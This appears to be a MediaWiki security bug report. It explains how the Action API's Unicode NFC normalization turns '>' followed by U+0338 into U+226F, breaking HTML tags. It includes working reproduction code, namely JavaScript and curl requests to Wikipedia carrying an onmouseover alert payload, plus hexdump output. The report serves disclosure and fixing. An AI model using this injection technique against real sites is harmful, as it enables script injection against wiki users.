TL;DR
The MediaWiki Action API converts output to Unicode Normalization Form C. Unfortunately, for HTML strings this is unsafe, because the sequence ‘>’ + U+0338 gets replaced by U+226F, breaking the tag end and potentially allowing injection attacks.
Steps to reproduce
- Visit any wiki page, such that mw.Api() has loaded
- Open the console
- Perform any mw.Api call that generates HTML, such that you can make the first character inside a tag be U+0338 COMBINING LONG SOLIDUS OVERLAY.
In other words, you want the API to send you some HTML that contains ‘>’ followed by U+0338.
For example, call { action: 'visualeditor', paction: 'parsefragment' } as follows:
const COMBINING_LONG_SOLIDUS = '\u0338'; new mw.Api().post( { action: 'visualeditor', paction: 'parsefragment', page: 'Test', wikitext: COMBINING_LONG_SOLIDUS + ' onmouseover="alert(42)" >content' } ).done( ( data ) => { const content = data.visualeditor.content; document.body.innerHTML = content console.log( 'Content:', content ); } ).fail( ( err ) => console.error( err ) );
This can also be reproduced without JavaScript – note the missing > after id="mwAg":
$ curl -s -d action=visualeditor -d paction=parsefragment -d page=Test -d wikitext=$'\u0338 onmouseover="alert(42)" >content ' -d format=json https://en.wikipedia.org/w/api.php | jq -r .visualeditor.content | hexdump -C 00000000 3c 70 20 69 64 3d 22 6d 77 41 67 22 e2 89 af 20 |<p id="mwAg"... | 00000010 6f 6e 6d 6f 75 73 65 6f 76 65 72 3d 22 61 6c 65 |onmouseover="ale| 00000020 72 74 28 34 32 29 22 20 3e 63 6f 6e 74 65 6e 74 |rt(42)" >content| 00000030 20 3c 2f 70 3e 0a | </p>.| 00000036
Compare this with a normal slash in the input:
$ curl -s -d action=visualeditor -d paction=parsefragment -d page=Test -d wikitext='/ onmouseover="alert(42)" >content ' -d format=json https://en.wikipedia.org/w/api.php | jq -r .visualeditor.content | hexdump -C 00000000 3c 70 20 69 64 3d 22 6d 77 41 67 22 3e 2f 20 6f |<p id="mwAg">/ o| 00000010 6e 6d 6f 75 73 65 6f 76 65 72 3d 22 61 6c 65 72 |nmouseover="aler| 00000020 74 28 34 32 29 22 20 3e 63 6f 6e 74 65 6e 74 20 |t(42)" >content | 00000030 3c 2f 70 3e 0a |</p>.| 00000035
Actual behaviour
The sequence ‘>’ + U+0338 gets replaced with the combined character U+226F ≯ NOT GREATER THAN. This is due to applying Unicode Normalization Form C. But (surprisingly!) that breaks the HTML tag, which potentially allows a Javascript injection attack, for instance:
'<p id="mwAg"\u226F onmouseover="alert(42)" >content</p>'
Expected behaviour
The HTML arrives with the sequence ‘>’ + U+0338 intact.
'<p id="mwAg">\u0338 onmouseover="alert(42)" >content</p>'
Note that this is a regular '>' symbol closing the HTML tag, followed by a U+0338 ◌̸ COMBINING LONG SOLIDUS OVERLAY, such that the contents of the <p> tag are "\u0338 onclick="alert(42)" >content"
Debugging note
Both expected and actual output may look similar or identical when rendered in the console:
<p id="mwAg"≯ onmouseover="alert(42)" >content</p> # actual <p id="mwAg"≯ onmouseover="alert(42)" >content</p> # expected
The best way to see for sure what’s there is to escape non-ASCII characters with a function:
function showUnicode( text ) { return text.replace( /[^\x00-\x7F]/g, ( ch ) => '\\u' + ch.charCodeAt( 0 ).toString( 16 ).padStart( 4, '0' ) ); } text = '<p id="mwAg"≯ onmouseover="alert(42)" >content</p>'; console.log( showUnicode( text ) ); // <p id="mwAg"\u226f onmouseover="alert(42)" >content</p>
Cause
The cause was identified by @dchan in the related ticket. The function MediaWiki::Api::ApiResult::validateValue is not just catching invalid UTF-8. It is also applying Unicode Normalization Form C. Unfortunately, as we have seen, it is unsafe to do this on HTML strings if they might contain ‘>’ + U+0338.
MediaWiki::Api::ApiResult::addValue
MediaWiki::Api::ApiResult::validateValue
MediaWiki::Language::normalize
UtfNormal::Validator::cleanUp
normalizer_normalize( $string, Normalizer::FORM_C )